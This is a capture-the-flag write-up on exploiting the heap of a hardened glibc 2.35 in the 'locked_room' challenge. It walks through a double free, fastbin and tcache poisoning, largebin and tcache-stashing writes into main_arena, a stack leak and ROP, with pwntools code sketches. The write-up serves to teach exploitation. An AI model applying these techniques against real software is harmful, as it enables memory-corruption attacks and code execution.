`locked_room` was a difficult heap challenge from this CTF, where the gimmick was that the libc was patched with multiple security mitigations. I didn't solve it during the CTF (rip), but I did get close, and managed to solve it the next day. Anyways, let the madness begin.
As expected, we have full protections on the main binary, cos why not.
The binary itself also isn't too interesting, just a simple heap note with only `alloc`, `free` and `view`:
Emphasis on simple, as a common pattern in this binary, and the challenge as a whole, is that barebones functions like `read`, `write` and `_exit` are used instead of IO functions and `exit`, which have complexity that can be attacked and manipulated. This reduces our options for RCE :(
The bug isn't too hard to spot: when a chunk is freed, its `.len` field is nulled, but not the pointer itself, and since there's no check in `free_chunk` for `.len == 0`, nothing stops us from freeing a chunk twice!
Well, nothing in the program at least. The interesting part of the challenge comes from the `libc.patch` file we're given, which changes the `malloc/` code in the glibc source (version 2.35).
Firstly, it introduces a new bit flag to put in the size fields of chunks. The idea is to track which chunks have been freed to the fastbin, similarly to `PREV_INUSE` with the unsortedbin/smallbins/largebins, so that double frees can be better detected (the current measures are easy to bypass), along with other fastbin sanity checks.
It also doubles as an anti-debugging measure, as `vis_heap_chunks` struggles when faced with this flag >:(
RIP tcache, you will be missed, as it now has the same check for a valid size field that fastbin does. This, along with the requirement that tcache (and fastbin) chunks are 16-byte aligned (so no misaligned size tricks), basically kills tcache as an easy win.
This is arguably the most annoying change, which restricts where our allocations can be.
The maximum address is `top + chunksize(top)`, which points to the end of the (allocated) heap region, and the minimum address is the maximum minus `av->system_mem`, which is the total amount of memory currently allocated for that region, so the minimum would be the start of the region.
It also prevents the end of our chunk coming after the top chunk, so no overlapping chunks with the top chunk to corrupt it, or allocating past it.
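To make the restriction concrete, here's my paraphrase of it as code; this is not the literal patch code, and the parameter names are just stand-ins for the `main_arena` fields:

```python
# my paraphrase of the described range restriction, not the literal patch code
def allocation_in_range(chunk, chunk_size, av_top, av_top_size, av_system_mem):
    max_address = av_top + av_top_size            # end of the (allocated) heap region
    min_address = max_address - av_system_mem     # normally the start of the region
    # the chunk has to start inside the region, and must not extend past the top chunk
    return min_address <= chunk <= max_address and chunk + chunk_size <= av_top
```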
One interesting thing to note here though, is that there's a call to `strlen`, which, when used within libc, goes through libc's own PLT and GOT, as it can use different architecture-specific implementations like SSE2 or AVX2. Since we're using glibc 2.35, the libc GOT is still writable (due to Partial RELRO), so this could be an avenue for code execution (however it's not what I used).
There are a few more, smaller changes, such as:
- Nulling more leftover pointers in `malloc`.
- Only recognising `main_arena`: `arena_for_chunk` always returns `&main_arena`. (For this reason, when I refer to `av`, this will be the same as `main_arena`.)
One thing that you may find helpful when doing this challenge is to have a reference copy of the patched `malloc.c` file, as this will help with reading the new source code, but also `gdb` will recognise `malloc.c`, so you can debug `malloc` and `free` with the source code. Just copy the `malloc/malloc.c` and `malloc/arena.c` files from the patched source tree to your system, then point `gdb` at them (e.g. with its `directory` command, plus `set substitute-path` if the compiled-in paths don't match).
So it looks like we've got our work cut out for us here. Let's start off easy, and write our handlers and get our leaks:
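The exact interface isn't shown here, but a minimal pwntools-style sketch of the handlers could look something like this; the binary name, menu options and prompt strings are guesses rather than the challenge's real interface:

```python
from pwn import process, p64, u64

p = process('./locked_room')     # binary name is a guess
next_idx = 0

def alloc(size, data=b'A'):
    global next_idx
    idx = next_idx
    next_idx += 1
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'index: ', str(idx).encode())
    p.sendlineafter(b'size: ', str(size).encode())
    p.sendafter(b'data: ', data)      # .len becomes however many bytes read() got
    return idx

def free(idx):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'index: ', str(idx).encode())

def view(idx):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'index: ', str(idx).encode())
    return p.recvline()               # .len bytes of the chunk's data (adjust as needed)
```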
`alloc_chunk` works by setting the `.len` of a chunk to the amount of data we read in the `read` call, so no read OOB, and `.len` is nulled on a free, so no read-after-free either, plus pointers are nulled on the `malloc` call.
Fortunately we can use the UAF to overlap chunks to get leaks. The basic idea is:

1. Allocate a chunk `a`, then free it.
2. Reallocate it with another chunk `b`, setting `b.len` to a suitable length.
3. With the UAF, free `a` again. Since `a` and `b` are the same chunk, we have a UAF on `b`!
4. Now use `b` to read the freed chunk.
I opted to use a large chunk bordering the top chunk, effectively UAFing the top chunk, then any allocation would overlap with the UAFed one.
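As a rough sketch of that idea, here's the simplest variant, using an unsortedbin-sized chunk so the freed chunk's `fd`/`bk` give a libc leak directly (my actual exploit uses the big chunk next to the top chunk instead, and the helpers, sizes and offsets below are just the placeholders from the sketch above):

```python
a = alloc(0x500)                  # chunk we'll free twice
alloc(0x18)                       # guard so `a` doesn't merge into the top chunk
free(a)                           # a.len is nulled, but the pointer survives
b = alloc(0x500, b'B' * 0x10)     # same memory as `a`, with b.len = 0x10
free(a)                           # UAF: the chunk is freed again, b.len stays intact
libc_leak = u64(view(b)[:8])      # fd of the unsortedbin chunk points into main_arena
libc_base = libc_leak - UNSORTED_FD_OFF   # UNSORTED_FD_OFF is a placeholder offset
# (a heap leak can be had similarly: the first chunk freed into an empty tcache bin
#  stores its own address >> 12 as its safe-linking-mangled fd)
```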
A useful tool for solving heap challenges is `tcache_perthread_struct`, a goldmine for arbitrary writes, and it will be useful here too (even if it's only on the heap for now).
The problem is, to get the initial corruption we only have a double free, and in this version of libc, double frees are heavily mitigated: tcache can't be double freed without a write-after-free, and the doubly linked list bins like the unsortedbin also have measures. Normally we could use the fastbin double free trick, but now we have `PREV_FAST_FREED`, so ideally we want to find a way to clear that bit.
Thankfully the patch isn't completely thorough in its enforcement of `PREV_FAST_FREED`. Looking through the patch for references to setting `PREV_FAST_FREED`, we can notice that there are some places where it's left out.
For example, the path in `_int_malloc` where an allocation is serviced from the top chunk is untouched by the patch. There, `victim` is the chunk that will be allocated and returned to the user, and we can see that it will have the `PREV_INUSE` bit set, and maybe the `NON_MAIN_ARENA` bit, but no reference to `PREV_FAST_FREED`.
In other words, if the top chunk has `PREV_FAST_FREED` set, it won't be preserved.
So now we have a plan for a double free on fastbin:
1. Allocate 2 chunks `a` and `b`, such that `b` borders the top chunk.
2. Free `b` to the fastbin. This sets the top chunk's `PREV_FAST_FREED`.
3. Allocate from the top chunk to clear `PREV_FAST_FREED`.
4. Free `a`, then `b`.
Chunk `a` is still needed to avoid the other double free protection, which checks that the fastbin chunk being freed isn't already at the head of the fastbin.
We can then use this to get an allocation on the heap to poison the `fd` pointer of a `tcache[0x290]` chunk, and point that to `heap_base+0x10`, and now we control all tcache allocations!
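Roughly, the fastbin part looks like this. It's a sketch with placeholder sizes, it reuses the helpers from earlier, it assumes the tcache for this size is already full so the frees land in the fastbin, and `target`/`b_addr` are placeholders for wherever you aim the poisoned `fd`:

```python
a = alloc(0x68)
b = alloc(0x68)                 # `b` must border the top chunk

free(b)                         # fastbin free: sets PREV_FAST_FREED on the top chunk
alloc(0x100)                    # served from the top chunk, whose new header is
                                # written without PREV_FAST_FREED, so the bit is gone
free(a)                         # head of the fastbin is now `a`, not `b`...
free(b)                         # ...so this double free goes undetected

# fastbin is now b -> a -> b; after draining the tcache for this size, allocating
# again hands `b` back, and the data we send lands where its fd was, letting us
# redirect the bin (safe-linking: stored pointers are xored with (&fd >> 12))
alloc(0x68, p64(target ^ ((b_addr + 0x10) >> 12)))
```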
We can now corrupt the heap to our liking .... so what?
We still have the tcache size and min/max address restrictions in play, so we can't aim our tcache allocations anywhere interesting. Ideally we'd want to corrupt the `main_arena->top` and `main_arena->system_mem` fields to adjust the min/max addresses, and open up our arbitrary allocation possibilities, but how do we do that without allocating onto them???
Just because we can't allocate outside the heap, doesn't mean we can't write anything! Introducing the largebin attack, which can be used to write a heap address to anywhere in memory, while only allocating inside the heap. While a heap address isn't too versatile, as in we can't write any libc addresses or code pointers, it's still useful, because what we can do is aim this at `main_arena->system_mem` to increase the range!
1. Pick a largebin to use, such as `0x400-0x430`.
2. Allocate 2 chunks `a` and `b` belonging to this largebin, where `b` is smaller than `a` (and separated from each other and the top chunk).
3. Free `a` to the unsortedbin.
4. Allocate a chunk larger than `a` to send `a` to `largebin[0x400-0x430]`.
5. Free `b` to the unsortedbin.
6. Overwrite `a->bk_nextsize` to `target-0x20`.
7. Allocate a chunk larger than `a` (and `b`).

This will write the address of `b` to `target`, which in our case is `main_arena->system_mem`!
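With the placeholder helpers from before (`heap_write`/`addr_of` standing in for the write primitive and bookkeeping we get over the heap, and the offsets being assumptions), those steps look roughly like:

```python
target = libc_base + MAIN_ARENA_OFF + SYSTEM_MEM_OFF   # &main_arena.system_mem (placeholder offsets)

lb_a = alloc(0x428)             # the larger chunk of the two
alloc(0x18)                     # guard
lb_b = alloc(0x418)             # the smaller chunk, same largebin
alloc(0x18)                     # guard

free(lb_a)                      # -> unsortedbin
alloc(0x500)                    # bigger than lb_a: sorts it into largebin[0x400-0x430]
free(lb_b)                      # -> unsortedbin

# bk_nextsize is the 4th qword of the chunk's user data
heap_write(addr_of(lb_a) + 0x18, p64(target - 0x20))

alloc(0x500)                    # sorting lb_b (smaller than lb_a) triggers
                                # lb_a->bk_nextsize->fd_nextsize = lb_b,
                                # i.e. the address of lb_b is written to target
```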
One important thing to note about overwriting `main_arena->system_mem` is that we don't want to make it too large. If it's much greater than `av->top`, then the `max_address - av->system_mem` calculation for the minimum address will underflow and become "negative", and since the comparisons are unsigned, the `min_address` will be VERY large, and thus none of our allocations will be valid.
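A quick illustration of that wrap-around, with made-up addresses:

```python
# all addresses here are made up, just to show the unsigned wrap-around
MASK = (1 << 64) - 1

top         = 0x55555555c000                 # av->top
max_address = top + 0x21000                  # top + chunksize(top)

# sane system_mem: min_address is the start of the heap region
print(hex((max_address - 0x22000) & MASK))          # 0x55555555b000

# system_mem overwritten with a heap address below max_address: min_address
# becomes tiny, which is exactly what we want
print(hex((max_address - 0x55555555c500) & MASK))   # 0x20b00

# system_mem much bigger than the heap end: the subtraction wraps around and
# min_address becomes enormous, so every allocation fails the check
print(hex((max_address - 0x7ffff7c00000) & MASK))   # 0xffffd5555d97d000
```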
So far we can shrink `min_address`, but (for now) this is only useful for maybe allocating on the binary's writable area. However, given:
- The protections of `locked_room`, like FULL RELRO.
- The lack of an `edit` function, meaning we can't just overwrite pointers for an easy arbitrary write (it would work for an arbitrary read though).
- The lack of a PIE leak.
this isn't much of a viable option. While we could overwrite the size of the top chunk to increase the `max_address`, this wouldn't be very helpful, as the ends of our chunks, and thus the chunks themselves, can't be after the top chunk. And even though our `system_mem` is large now, we can't do a House of Force since our allocation sizes are capped at `0x800`. So we'd need to overwrite `av->top` to a greater address.
The largebin attack can only write heap addresses (and ones lower than `av->top`, for that matter). While we could misalign the largebin attack, such as writing it to `&av->top + 1` to make it much larger, we still need `av->top` to be a valid address, as it needs to be able to access `chunksize(av->top)`.
So ideally we'd want to be able to write a libc or stack address, depending on the route for RCE you take, but how can we do that?
One way could be allocating somewhere before `&av->top` and overwriting `av->top`, but that just shifts the problem to:

1. How to increase `av->top` enough to come after `&av->top`.
2. How to write a fake size field before `&av->top` (for a tcache/fastbin allocation).
Thankfully there is another attack which solves the 1st problem, this time involving smallbins and tcache, which can be used similarly to a largebin attack, but this allows us to write a libc address instead. But how?
If the smallbin (for the size `nb`) is non-empty, it unlinks the last chunk (`bin->bk`) and returns it. But before returning, it will then check if there are other smallbin chunks that could be linked into the tcachebin of that same size.
Now it iterates through the smallbin until either it's empty or the tcache is full (this part is important), unlinking smallbin chunks the same way as before, then adding the chunks to the tcache.

Interestingly, the `bck->fd != victim` check is absent in this loop, so nothing really stops us overwriting a `->bk` field in one of these `tc_victim` chunks to control `bck`. If we did that, then it would reach the line `bck->fd = bin`, and would write the address of the smallbin (which is located in `main_arena`) to `bck+0x10`!
One issue to deal with is what happens after this? Since `bin->bk = bck;` is also triggered, we have `last(bin) = bck`, so we go to that chunk next in the loop, where we may face problems (depending on what our `bck` was).
This is where that "tcache being full" check comes into play. While malloc will believe there's more to take from the smallbin, if the `tc_victim` (with the malicious `bck`) was the 7th chunk for that tcache bin (i.e. the tcache is now full), then the loop terminates, and nothing more is done with the `bck`.
We can use this to overwrite `target = &av->top` with a libc address as follows:
1. Allocate 8 smallbin-sized chunks (again, separated from each other and the top chunk).
2. Fill the tcache of the same size.
3. Free those 8 chunks (to the unsortedbin).
4. Allocate a bigger chunk to send them all to the smallbin.
5. Overwrite the `->bk` field of the last freed smallbin chunk to `target-0x10`. This will be the last chunk used in the loop (i.e. `bin->fd`).
6. Allocate a chunk of the same smallbin size.

The last allocated chunk will be serviced by the first freed smallbin chunk (`bin->bk`), and then the remaining 7 smallbin chunks are sent to the tcache, while also writing to `av->top`!
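Sketching that out with the same placeholder helpers; `SMALL`, the offsets, and the detail that the tcache for this size gets emptied again before the final allocation (e.g. by rewriting `tcache_perthread_struct`, which we control) are all assumptions about the setup:

```python
SMALL  = 0xa8                                       # some smallbin-sized request
target = libc_base + MAIN_ARENA_OFF + TOP_OFF       # &main_arena.top (placeholder offsets)

sb = [alloc(SMALL) for _ in range(8)]               # separated by guard chunks in reality
for c in sb:                                        # tcache[SMALL] is full here, so
    free(c)                                         # these all go to the unsortedbin
alloc(0x500)                                        # sorts all 8 into the smallbin

# corrupt ->bk (user data + 8) of the last-freed chunk, the one sitting at bin->fd
heap_write(addr_of(sb[-1]) + 0x8, p64(target - 0x10))

# with tcache[SMALL] emptied again, this returns bin->bk, stashes the remaining 7
# chunks, and the corrupted one makes bck->fd = bin write the smallbin's (libc)
# address over av->top
alloc(SMALL)
```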
This has a small (or rather, large) issue. See, when `av->top` points into `av->bins`, while we have solved the problem of our allocations coming before `av->top`, we run into another issue: the top chunk size.
The `.bins` array is initially set up so that for every bin index `i`, `bin_at(av, i)->fd == bin_at(av, i)->bk == bin_at(av, i)`, i.e. each bin starts as an empty circular list pointing at itself.
The way this is done is by having the `fd` and `bk` pointers point `-0x10` back, so the `bin->prev_size` and `bin->size` fields overlap with the previous bin's `fd` and `bk` pointers.
This means that `chunksize(av->top)` will be the previous smallbin's `bk` pointer, by default a libc address, and because `av->system_mem` is a heap address, `min_address` will be too large for the `main_arena` allocation (`0x7f... + 0x7f... - 0x55... ≈ 0xa9...`).
While we could lower that `bk` pointer to a heap address by having chunks freed to that smallbin, so that the `main_arena` allocation could still work, we need to keep in mind how the tcache stashing write works. When we trigger the actual write, we allocate a smallbin chunk back on the heap, so when `av->top` is overwritten, it will then check if that heap chunk is valid, which it won't be due to the top chunk size.
So we need to lower that even further. For this, we can use another largebin attack! While it does only write a heap address, we can actually misalign this write by `-2` so that the top 2 null bytes of the address overwrite the greatest 2 bytes of the `bk` pointer. This will shrink it to a 32-bit integer (from 48 bits), which is plenty small enough for that `min_address` calculation to be below the heap region.
This will need to be done before the tcache stashing attack, and will completely corrupt the previous smallbin, but again, who actually cares.
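A quick demonstration of what that misaligned write does to the neighbouring pointer (all values made up):

```python
import struct

memory = bytearray(16)
bk = 0x00007ffff7a18cc0                        # previous smallbin's bk (a libc address)
struct.pack_into('<Q', memory, 2, bk)          # pretend the bk slot starts at offset 2

heap_addr = 0x000055555555d2a0                 # what the largebin attack writes
struct.pack_into('<Q', memory, 0, heap_addr)   # ...but written 2 bytes *before* the slot

print(hex(struct.unpack_from('<Q', memory, 2)[0]))   # 0x55555555: now only 32 bits
```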
Now that we can, in theory, set up the conditions for an allocation onto `main_arena` and overwrite `av->top`, we need to decide what we want to target.
The avenue I went down was the classic "overwrite the return address", but for that we're gonna need a stack leak. But how? Even if we could allocate on/near something like `environ` or `__libc_argv`, the `view` would only allow us to read the data we send (due to how `.len` is set), so the only way of reading the data at these variables is to overwrite them.
So it seems the only way to get a data leak is to bring the data to us (i.e. into our chunk), rather than bringing our chunks to the data, which is similar to what we did when leaking libc and heap. Thankfully, we can use our good ol' friend tcache stashing to do this.

The idea is we can "link" a stack address into a smallbin by pointing a `bk` pointer at it, then when the tcache stashing occurs, the stack address is the last `tc_victim`, and will be put into the head of the tcachebin (i.e. into `tcache_perthread_struct`), and since we control the allocation over `tcache_perthread_struct`, we can then view it to leak the stack.
So the key difference between the setup here and before is that we use 2 fewer smallbin chunks (8 -> 6), and we point `bk` to `target-0x18`, where `target` contains a stack address. This results in `target-0x18` being the 6th chunk linked into the tcache, then finally its `bk` pointer (our stack address) is the 7th and final `tc_victim`. And of course, since the tcache is full after linking the stack address into the tcache, the loop terminates.
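The same sketch as before, adjusted for the leak; `LIBC_ARGV_OFF`, `tps` (the index of our chunk overlapping `tcache_perthread_struct`) and `ENTRY_OFF` are placeholders:

```python
target = libc_base + LIBC_ARGV_OFF                  # &__libc_argv, holds a stack pointer

sb = [alloc(SMALL) for _ in range(6)]
for c in sb:
    free(c)                                         # tcache full -> unsortedbin
alloc(0x500)                                        # sort the 6 chunks into the smallbin

heap_write(addr_of(sb[-1]) + 0x8, p64(target - 0x18))

alloc(SMALL)                                        # stash loop: target-0x18 is the 6th
                                                    # chunk, its "bk" (the stack address
                                                    # at target) becomes the 7th tc_victim,
                                                    # landing at the head of the tcachebin
stack_leak = u64(view(tps)[ENTRY_OFF:ENTRY_OFF + 8])   # read it out of tcache_perthread_struct
```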
Allocating on the stack will be made more difficult by the existence of canaries, as we don't have a good way of leaking them. Like I mentioned earlier, the `view` function makes leaking data with allocations difficult, and we can't use the tcache stashing trick to leak them, as the leaked value needs to be a writable address.
Canaries do get replaced all the time, so maybe you could overwrite a canary with an allocation and it would later come back, but then the overwrite would be detected as stack smashing.
`main` has a canary that doesn't get used, but also wouldn't be replaced, so no leak there. And since it doesn't return, the main target is `alloc_chunk`. So if we can't leak it, can we skip it?
Well, we don't have any candidates for a tcache/fastbin allocation, but interestingly we don't actually need those: we can use `av->top`.
Once we have `av->top` pointing into `main_arena`, before we fully control `av->top` using the tcache allocation, a useful preparation step is allocating from `av->top` to overwrite the `bins` array and clean up the largebins. The largebins being corrupted from the largebin attacks does cause us problems when allocating from the top chunk.
Firstly, if our allocations are smaller than the largebin chunks, they will be serviced using those (through remaindering), and not the top chunk. And we can't just empty the largebins, as they're corrupted. So if we use chunks larger than the largebins, we bypass this, so we're fine, right?
Not quite, because once we set up the tcache write into `main_arena`, the fastbin array is corrupted, and thus any large allocations will fail due to `malloc_consolidate`, so we wouldn't be able to allocate larger than the largebins to bypass them.
This is a simple fix, it just requires fixing the pointers in `av->bins`, i.e. pointing each corrupted bin's `fd` and `bk` back at the bin itself so it looks empty again:
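Something along these lines, where `BINS_OFF`, the bin indices and `arena_write` (the write we get from the allocation off the fake `av->top`) are all placeholders for however your exploit lays this out:

```python
def bin_chunk_addr(index):
    # the fd slot of bin `index` lives at main_arena.bins[(index - 1) * 2];
    # the bin's "chunk" address is 0x10 before that
    fd_slot = libc_base + MAIN_ARENA_OFF + BINS_OFF + (index - 1) * 0x10
    return fd_slot - 0x10

for idx in (LARGEBIN_IDX_1, LARGEBIN_IDX_2):            # the bins the largebin attacks trashed
    bin_chunk = bin_chunk_addr(idx)
    arena_write(bin_chunk + 0x10, p64(bin_chunk) * 2)   # fd = bk = bin -> looks empty
```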
Now we (finally) have all the components for an exploit, so let's put it together:
1. Use the double free to overlap chunks with freed chunks, for heap and libc leaks.
2. Get a double free on fastbins by clearing `PREV_FAST_FREED` using a top chunk allocation, to poison the fastbin.
3. Use this fastbin to poison `tcache[0x290]` to allocate onto `tcache_perthread_struct` for infinite writes.
4. Allocate the chunks necessary for:
   - Putting a fake tcache size into the fastbin array, specifically `fastbin[0x70]` (size chosen for alignment reasons).
   - The 2 largebin attacks.
   - The 2 tcache stashing attacks.
5. Perform the largebin attack against `main_arena->system_mem` first, to decrease `min_address` enough to be able to still do heap allocations once `av->top` has been controlled.
6. Perform the largebin attack against `main_arena+262` (using larger sizes than for the previous one to avoid reallocation), which is a misaligned write on `smallbin[0xa0]` to set up the top chunk size for later.
7. Do tcache stashing to leak `__libc_argv` for a stack leak.
8. Do tcache stashing against `main_arena->top` using `smallbin[0xb0]`, which writes the address of `&smallbin[0xa0]` to `main_arena->top` (which has the fake top chunk size).
9. Do an allocation larger than the (corrupted) largebins to allocate from the new `av->top` and clean up the largebins.
10. Put the fake tcache size into the fastbin array (this must be done after all the largebin allocations to avoid `malloc_consolidate`).
11. Allocate on `main_arena` using the tcache to overwrite `main_arena->top` to point to our target on the stack.
12. Use a smallbin-sized allocation to allocate on the stack using the top chunk, and overwrite the return address to get ROP!
dice{without_love..._'the_flag'_cannot_be_seen...!}
A few side notes:

- These changes seem to be adapted from an existing hardening patch set, and thankfully they only used those changes.
- Like I mentioned earlier, a pattern here is using barebones functions to reduce the attack surface for RCE, so we can't go after `stderr` or the `exit` internals.
- While the `system_mem` overwrite only decreases the minimum address for now, it's a useful first step, and sets up the later attacks.
- There are good demos of the largebin attack elsewhere; the steps above are just a brief overview of how to do it against some address `target`.
- An attack that would have worked well for the 1st problem was the unsortedbin attack (since patched out of glibc), which was like the largebin attack, except it could write a libc address instead. And not just any libc address: it came from `&av->bins`, which comes after `&av->top`. Shame too, because there's actually a relatively simple solution to the 2nd problem: as you can see from `main_arena`'s layout, the fastbin array is right before `->top`, and since we can easily corrupt the fastbins (using our tcache writes), we could bring any pointer to the head of a fastbin, but that could also be any value, such as a fake size field for a fake tcache chunk. Of course we couldn't allocate from this fastbin, and largebin allocations would fail because `malloc_consolidate()` would attempt to dereference it, but who actually cares?
- The mechanism responsible for the smallbin write is moving smallbin chunks to the tcache (i.e. stashing them in the tcache), which is triggered in `_int_malloc`, specifically in the initial case where it's allocating from a smallbin. I originally found out about this technique (and tcache stashing in general) from another writeup.
- `av->top` doesn't have alignment restrictions like tcache/fastbins, and as long as `chunksize(av->top) <= av->system_mem` the top chunk size is considered valid. So we could actually just use the PIE address after the canary as a top chunk size, as `av->system_mem` is (now) a heap address, and thus will always be bigger (you could also misalign the size to make it smaller, as it's followed by a 0).